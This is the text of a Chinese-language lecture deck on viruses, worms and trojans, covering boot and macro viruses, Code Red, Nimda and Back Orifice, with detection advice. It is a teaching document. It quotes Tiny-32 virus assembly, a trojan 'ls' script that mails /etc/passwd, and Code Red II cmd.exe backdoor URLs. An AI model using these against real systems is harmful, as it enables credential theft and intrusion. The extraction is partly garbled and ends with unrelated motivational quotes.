计算机病毒蠕虫和特洛伊木马介绍(-)课件.ppt

1、计算机病毒、蠕虫和特洛伊木马提纲计算机病毒网络蠕虫特洛伊木马计算机病毒 病毒结构模型 病毒的分类 引导型病毒 文件型病毒 宏病毒 病毒举例 病毒防范计算机病毒的结构传染条件判断传染代码表现及破坏条件判断破坏代码传染模块表现模块计算机病毒的分类 按攻击平台分类：DOS,Win32，MAC，Unix 按危害分类：良性、恶性 按代码形式：源码、中间代码、目标码 按宿主分类：引导型 主引导区 操作系统引导区 文件型 操作系统 应用程序 宏病毒引导型病毒引导记录 主引导记录（MBR）55AA主引导程序(446字节)分区1(16 字节)主分区表(64字节）分区2(16 字节)分区3(16 字节)分区4(1

2、6 字节)结束标记（2字节）引导代码及出错信息A引导型病毒系统引导过程Power OnCPU&ROM BIOS InitializesPOST TestsLook for boot deviceMBR bootPartition Table LoadDOS Boot Sector RunsLoads IO.SYSMSDOS.SYSDOS Loaded引导型病毒感染与执行过程系统引导区引导正常执行病毒病毒执行病毒驻留带毒执行。病毒引导系统病毒体。病毒的激活过程空闲区。内存空间int8int21int2Fint4A时钟中断处理DOS中断处理外设处理中断实时时种警报中断空闲区带病毒程序空闲区空闲区正

3、常程序病 毒int8int8。int8。int8int8int8int8int8int8int8int8int8int8。int8int8空闲区正常程序正常程序。正常程序正常程序正常程序int8是26日？是,破坏！int8举例小球病毒（Bouncing Ball)在磁盘上的存储位置文件分配表病毒的第二部分000号扇区001号扇区第一个空簇FF7正常的引导扇区正常的引导扇区病毒的第一部分感染后的系统启动过程启动将病毒程序的第一部分送入内存高端将第二部分装入内存，与第一部分拼接在一起读入真正的Boot 区代码，送到0000:TC00处修改INT 13 中断向量，指向病毒转移到 0000:TC00处

4、，开始真正的系统引导触发条件修改后的INT 13进入INT 13中断是否为读盘？执行正常的INT 13程序执行正常的INT 13程序N所读盘是否是自身？Y修改INT8 开始发作Y是否整点或半点Y执行正常的INT 13程序Y是否带病毒？N调用传染过程感染磁盘N不发作执行正常的INT 13程序N病毒检测原理 特征匹配 例如，在香港病毒:1F 58 EA 1A AF 00 F0 9C:POP AXJMP F000 AF1APUSHF 行为监控 对中断向量表的修改 对引导记录的修改 对.exe,.com文件的写操作 驻留内存 软件模拟防范与检测 数据备份 不要用移动介质启动（设置CMOS选项）设置CM

5、OS的引导记录保护选项 安装补丁，并及时更新 安装防病毒软件，及时更新病毒定义码 限制文件共享 不轻易打开电子邮件的附件 没有病毒处理前不要使用其他移动介质 不要运行不可信的程序 移动介质写保护文件型病毒文件结构.COM文件.EXE 文件PSP Header(256 bytes)Code,Data,StackSegment(s)(64K Bytes)代码、数据、堆栈在通一段中在内存中的.COM是磁盘文件的镜像 PSP Header(512 bytes)Code Segment(s)(64K)Data Segment(s)(64K)Stack Segment(s)(64K)其他可执行的文件类型.

6、BAT.PIF.SYS.DRV.OVR.OVL.DLL.VxD正常正常程序程序正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头正常正常程序程序程序头程序头程序头程序头程序头程序头程序头程

7、序头程序头程序头程序头程序头程序头程序头程序头程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序病毒程序程序头病毒程序病毒程序程序头病毒程序病毒程序程序头病毒程序病毒程序程序头病毒程序病毒程序程序头病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序正常正常程序程序程序头程序头文件型病毒感染机理文件型病毒举例 最简单的病毒Tiny-32(32 bytes)寻找宿主文件 打开文件 把自己写入文件 关闭文件MOV AH,4E;

8、setup to find a fileINT 21;find the host fileMOV AX,3D02;setup to open the host fileINT 21;open host fileMOV AH,40;setup to write file to diskINT 21;write to fileDB *.COM;what files to look for宏病毒（Macro Virus）历史：1980年，Dr.Fredrick Cohen and Ralf Burger 论文 1994年，Microsoft Word 第一例宏病毒 Word,Excel,Access

9、,PowerPoint,Project,Lotus AmiPro,Visio,Lotus 1-2-3,AutoCAD,Corel Draw.使用数据文件进行传播，使得反病毒软件不再只关注可执行文件和引导区 DOE ViRT 统计，85%的病毒感染归因于宏病毒 易于编写，只需要一两天的时间，1015行代码 大量的用户：90 Million MS Office Users 人们通常不交换程序，而交换数据宏病毒工作机理有毒文件.docNormal.dot激活autoopen宏写入无毒文件.docNormal.dot激活病毒注意事项 Macro 可以存在模板里，也可以存在文档里 RTF文件也可以包含宏

10、病毒 通过IE 浏览器可以直接打开，而不提示下载提纲计算机病毒网络蠕虫特洛伊木马蠕虫（Worm）一个独立的计算机程序，不需要宿主 自我复制，自主传播（Mobile）占用系统或网络资源、破坏其他程序 不伪装成其他程序，靠自主传播 利用系统漏洞；利用电子邮件（无需用户参与）莫里斯蠕虫事件 发生于1988年，当时导致大约6000台机器瘫痪 主要的攻击方法 Rsh，rexec：用户的缺省认证 Sendmail 的debug模式 Fingerd的缓冲区溢出 口令猜测CR I 主要影响Windows NT系统和Windows 2000主要影响国外网络据CERT统计，至8月初已经感染超过25万台 主要行为利

11、用IIS 的Index服务的缓冲区溢出缺陷进入系统检查c:notworm文件是否存在以判断是否感染中 文 保 护（是 中 文windows就不修改主页）攻击白宫！CR II Inspired by RC I 影响波及全球 国内影响尤其广泛 主要行为 所利用缺陷相同 只感染windows2000系统，由于一些参数的问题，只会导致NT死机 休眠与扫描：中文windows，600个线程Nimda 简介 影响系统：MS win9x,wind2k,win XP 传播途径：Email、文件共享、页面浏览、MS IIS目录遍历、Code Red 后门 影响 群发电子邮件，付病毒 扫描共享文件夹，扫描有漏洞的

12、IIS,扫描有Code Red后门的IIS Server红色代码病毒 红色代码病毒是一种结合了病毒、木马、DDOS机制的蠕虫。2001年7月中旬，在美国等地大规模蔓延。2001年8月初，出现变种coderedII，针对中文版windows系统，国内大规模蔓延。通过80端口传播。只存在与网络服务器的内存，不通过文件载体。利用IIS缓冲区溢出漏洞（2001年6月18日发布）CodeRed I在侵入一台服务器后，其运行步骤是：设置运行环境，修改堆栈指针，设置堆栈大小为218h字节。接着使用RVA（相对虚拟地址）查找GetProcAddress的函数地址，然后就获得其他socket、connect、s

13、end、recv、closesocket等函数地址；如果C:notworm在，不再进一步传染；传染其他主机。创造100个线程，其中99个用户感染其他WEB服务器，被攻击IP通过一个算法计算得出；篡改主页，如果系统默认语言为“美国英语”，第100个进程就将这台服务的主页改成“Welcome to http:/!,Hacked By Chinese!”，并持续10个小时。（这个修改直接在内存中修改，而不是修改*.htm文件）；1.如果时间在20：00UTC和23：59UTC之间，将反复和白宫主页建立连接，并发送98k字节数据，形成DDOS攻击。CodeRed II增加了特洛依木马的功能，并针对中国

14、网站做了改进计算IP的方法进行了修改，使病毒传染的更快；检查是否存在CodeRedII原子，若存在则进入睡眠状态防止反复感染，若不存在则创建CodeRedII原子；创建300个线程进行传染，若系统默认语言为简体中文或繁体中文，则创建600个线程；检查时间。病毒作者的意图是传播过程在2001年10月1日完成，之后，蠕虫会爆发而使系统不断重新启动。在系统中安装一个特洛依木马：拷贝系统目录cmd.exe到IIS的脚本执行目录下，改名为root.exe；将病毒体内的木马解压缩写到C盘和D盘的explorer.exe1.木马每次系统和启动都会运行，禁止系统的文件保护功能，并将C盘和D盘通过web服务器共

15、享CodeRed II 攻击形式http:/x.x.x.x/c/inetpub/scripts/root.exe?/c+dirhttp:/x.x.x.x/c/winnt/system32/cmd.exe?/c+dir 其中x.x.x.x是被攻击的IP地址，dir可以是任意命令，比如删除系统中的文件，向外发送机密数据等，这个后门后来也成为了nimda病毒的一个传播模式。下面是cert/cc上提供的被攻击服务器日志(CA-2001-11)2001-05-06 12:20:19 10.10.10.10-10.20.20.20 80 GET/scripts/././winnt/system32/cmd

16、.exe/c+dir 200 2001-05-06 12:20:19 10.10.10.10-10.20.20.20 80 GET/scripts/././winnt/system32/cmd.exe/c+dir+.200 红色代码病毒的检测和防范 针对安装IIS的windows系统；是否出现负载显著增加（CPU/网络）的现象；用netstat an检查是否有许多对外的80端口连接 在web日志中检查是否有/default.ida?xxx.%u0078%u0000 u00=a HTTP/1.0这样的攻击记录；查找系统中是否存在文件c:explorer.exe或d:explorer.exe以及r

17、oot.exe；检查注册表文件中是否增加了C和D虚拟目录，以及文件保护功能是否被禁止。在任务管理器中检查是否存在两个explorer.exe进程。提纲计算机病毒网络蠕虫特洛伊木马特洛伊木马 名字来源：古希腊故事 通过伪装成其他程序、有意隐藏自己恶意行为的程序，通常留下一个远程控制的后门 没有自我复制的功能 非自主传播 用户主动发送给其他人 放到网站上由用户下载最简单的木马举例ls#!/bin/sh/bin/mail /etc/passwdlsPATH=./:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin特洛依木马举例 Back Orifi

18、ce Cult of the Dead Cow在1998年8月发布,公开源码软件，遵守GPL，是功能强大的远程控制器木马。boserver.exe、boconfig.exe、bogui.exe 在BO服务器上启动、停止基于文本的应用程序 目录和文件操作。包括创建、删除、查看目录、查找、解压、压缩。共享。创建共享资源 HTTP服务。启动或停止HTTP服务。击键记录。将BO服务器上用户的击键记录在一个文本文件中，同时记录执行输入的窗口名。（可以获得用户口令）特洛依木马 视频输入、播放。捕捉服务器屏幕到一个位图文件中。网络连接。列出和断开BO服务器上接入和接出的连接，可以发起新连接。查看信息。查看所

19、有网络端口、域名、服务器和可见的共享“出口”。返回系统信息，包括机器名、当前用户、CPU类型、内存容量及可用内存、Windows版本、驱动器类型、硬盘容量及使用空间。端口重定向。注册表 锁住或重启计算机。传输文件特洛依木马 使用netstat a 检查是否还有未知端口监听(默认31337)检测和删除 注册表HLMsoftwaremicrosoftwindowscurrentVersionrunservices键值，是否有“Name Data.exe”，若有则删除 C:windowssystem目录：删除“.exe”文件和windll.dll文件特洛依木马 其他木马 国外subsever、dag

20、ger、ACKcmdC、DeepThroat、SatansBackdoor 等 国内（更常见）冰河、广外女生、netspy、黑洞等删除木马的通用方法Win.ini文件windows节中run=和loadsystem.ini文件boot节的shell=explorer.exeAutoexec.bat文件win命令注册表HLMsoftwaremicrosoftwindowscurrentversionrunHCUsoftwaremicrosoftwindowscurrentversionrunonceHCRexefileshellopencommand“%1”%*HCUcontrol paneld

21、esktopwallpaper更高级的木马技术 服务器端程序文件的隐藏 问题：磁盘上的文件、系统中的进程 木马：DLL 陷阱 防范：DLL 签名技术 隐藏端口监听 寄生：选择一个已经打开的端口，如80 潜伏：不使用TCP/UDP,使用ICMP 突破防火墙的限制 反弹端口型木马：突破防火墙的限制:反弹端口型木马Web Server病毒、蠕虫与木马的比较特性病毒蠕虫木马宿主需要不需要需要表现形式不以文件形式存在独立的文件伪装成其他文件传播方式依赖宿主文件或介质自主传播依靠用户主动传播主要危害破坏数据完整性、系统完整性侵占资源留下后门，窃取信息传播速度快极快慢提纲网络攻击方法窃听口令破解端口扫描和信

22、息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码1、用爱心来做事，用感恩的心做人。2、人永远在追求快乐，永远在逃避痛苦。3、有多大的思想，才有多大的能量。4、人的能量=思想+行动速度的平方。5、励志是给人快乐，激励是给人痛苦。6、成功者绝不给自己软弱的借口。7、你只有一定要，才一定会得到。8、决心是成功的开始。9、当你没有借口的那一刻，就是你成功的开始。10、命运是可以改变的。11、成功者绝不放弃。12、成功永远属于马上行动的人。13、下定决心一定要，才是成功的关键。14、成功等于目标，其他都是这句话的注解。15、成功是一个过程，并不是一个结果。16、成功者

23、学习别人的经验，一般人学习自己的经验。17、只有第一名可以教你如何成为第一名。18、学习需要有计划。19、完全照成功者的方法来执行。20、九十九次的理论不如一次的行动来得实际。21、一个胜利者不会放弃，而一个放弃者永远不会胜利。22、信心、毅力、勇气三者具备，则天下没有做不成的事。23、如果你想得到，你就会得到，你所需要付出的只是行动。24、一个缺口的杯子，如果换一个角度看它，它仍然是圆的。25、对于每一个不利条件，都会存在与之相对应的有利条件。26、一个人的快乐，不是因为他拥有的多，而是他计较的少。27、世间成事，不求其绝对圆满，留一份不足，可得无限美好。28记住：你是你生命的船长；走自己的

24、路，何必在乎其它。29、你要做多大的事情，就该承受多大的压力。30、如果你相信自己，你可以做任何事。31、天空黑暗到一定程度，星辰就会熠熠生辉。32、时间顺流而下，生活逆水行舟。33、生活充满了选择，而生活的态度就是一切。34、人各有志，自己的路自己走。35、别人的话只能作为一种参考，是不能左右自己的。36、成功来自使我们成功的信念。37、相互了解是朋友，相互理解是知己。38、没有所谓失败，除非你不再尝试。39、有时可能别人不在乎你，但你不能不在乎自己。40、你必须成功，因为你不能失败。41、羡慕别人得到的，不如珍惜自己拥有的。42、喜欢一个人，就该让他（她）快乐。43、别把生活当作游戏，谁游

25、戏人生，生活就惩罚谁，这不是劝诫，而是-规则！44、你要求的次数愈多，你就越容易得到你要的东西，而且连带地也会得到更多乐趣。45、把气愤的心境转化为柔和，把柔和的心境转化为爱，如此，这个世间将更加完美。46、一份耕耘，一份收获，付出就有回报永不遭遇过失败，因我所碰到的都是暂时的挫折。47、心如镜，虽外景不断变化，镜面却不会转动，这就是一颗平常心，能够景转而心不转。48、每件事情都必须有一个期限，否则，大多数人都会有多少时间就花掉多少时间。49、人，其实不需要太多的东西，只要健康地活着，真诚地爱着，也不失为一种富有。50、生命之长短殊不重要，只要你活得快乐，在有生之年做些有意义的事，便已足够。51、活在忙与闲的两种境界里，才能俯仰自得，享受生活的乐趣，成就人生的意义。52、一个从来没有失败过的人，必然是一个从未尝试过什么的人。53、待人退一步，爱人宽一寸，人生自然活得很快乐。54、经验不是发生在一个人身上的事件，而是一个人如何看待发生在他身上的事。55、加倍努力，证明你想要的不是空中楼阁。胜利是在多次失败之后才姗姗而来。